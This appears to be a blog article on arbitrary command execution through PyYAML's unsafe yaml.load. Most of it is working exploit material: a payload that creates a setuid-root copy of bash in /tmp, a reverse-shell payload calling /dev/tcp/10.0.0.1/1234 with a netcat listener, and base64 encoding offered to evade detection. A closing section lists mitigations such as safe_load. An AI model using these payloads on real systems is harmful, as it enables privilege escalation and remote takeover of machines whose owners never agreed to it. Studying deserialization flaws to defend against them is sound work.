The YAML (YAML Ain't Markup Language) library in Python has been identified as having vulnerabilities that allow the execution of arbitrary commands under certain conditions. The vulnerability arises from the use of the yaml.load function without specifying a safe loader. By default, yaml.load can execute arbitrary Python objects, which creates an attack surface for malicious payloads.
Exploitation via Arbitrary Command Execution
The fundamental risk lies in the deserialization process. When a YAML document contains a malicious payload, yaml.load processes the embedded directives, potentially leading to code execution. For example, consider the following snippet:
import yaml
filename = "example.yml"
data = open(filename, 'r').read()
yaml.load(data) # Unsafe usage
Here, the yaml.load function parses example.yml without restrictions, making it vulnerable if the YAML content includes unsafe directives. A typical exploit payload can be crafted to execute arbitrary system commands.
Example Payload
import yaml
from yaml import Loader, UnsafeLoader
# Malicious payload
payload = b'!!python/object/new:os.system ["cp `which bash` /tmp/bash;chown root /tmp/bash;chmod u+sx /tmp/bash"]'
# Exploitation
yaml.load(payload)
yaml.load(payload, Loader=Loader)
yaml.load(payload, Loader=UnsafeLoader)
Each of these invocations processes the payload, resulting in the creation of a privileged executable in /tmp/bash. This binary can then be executed with elevated privileges:
/tmp/bash -p
This demonstrates the potential for privilege escalation if the vulnerability is exploited on a system with misconfigured permissions or other weaknesses.
Reverse Shell Exploitation
A particularly insidious use case is leveraging the vulnerability for a reverse shell. This allows attackers to gain remote access to the target machine. The process involves starting a listener on the attacker's machine and crafting a YAML document designed to establish the reverse connection.
On the attacker's machine, initiate a Netcat listener:
nc -lvnp 1234
On the target system, execute the following Python script as root:
import yaml
# Reverse shell payload
data = '!!python/object/new:os.system ["bash -c \"bash -i >& /dev/tcp/10.0.0.1/1234 0>&1\""]'
yaml.load(data) # Executes the reverse shell
This payload instructs the target machine to connect back to the attacker's listener, providing a fully interactive shell with the privileges of the executing process.
Base64 Encoding for Obfuscation
To bypass basic security controls or filters, the payload can be Base64-encoded. This method adds a layer of obfuscation, potentially evading detection by static analysis tools.
Example
from base64 import b64decode
import yaml
# Base64-encoded payload
encoded_payload = b"ISFweXRa...YXNoIl0=" # Truncated for brevity
payload = b64decode(encoded_payload)
# Execute the payload
yaml.load(payload)
Mitigation Techniques
Professionals must adopt strict coding practices to eliminate such vulnerabilities. Recommended mitigations include:
-
Using Safe Loaders: Replace
yaml.loadwithyaml.safe_load, which prevents the execution of arbitrary objects.
import yaml yaml.safe_load(data) # Safe alternative Restricting Input Sources: Ensure YAML inputs are sanitized and originate only from trusted sources.
Applying Static Analysis: Use tools to scan codebases for unsafe
yaml.loadinvocations.Environment Hardening: Restrict system permissions to minimize the impact of exploitation. For example, using containerized environments limits an attacker's ability to escalate privileges.
The YAML library’s default behavior exemplifies the risks associated with deserialization in dynamically typed languages like Python. Exploiting this vulnerability requires minimal sophistication, making it a high-priority issue for secure application development. Adopting safe coding practices, along with robust input validation and runtime safeguards, is imperative to mitigate these risks effectively.
Top comments (0)